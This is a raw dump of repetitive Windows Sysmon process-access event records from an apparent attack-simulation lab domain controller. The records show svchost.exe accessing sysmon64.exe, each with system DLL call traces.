08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 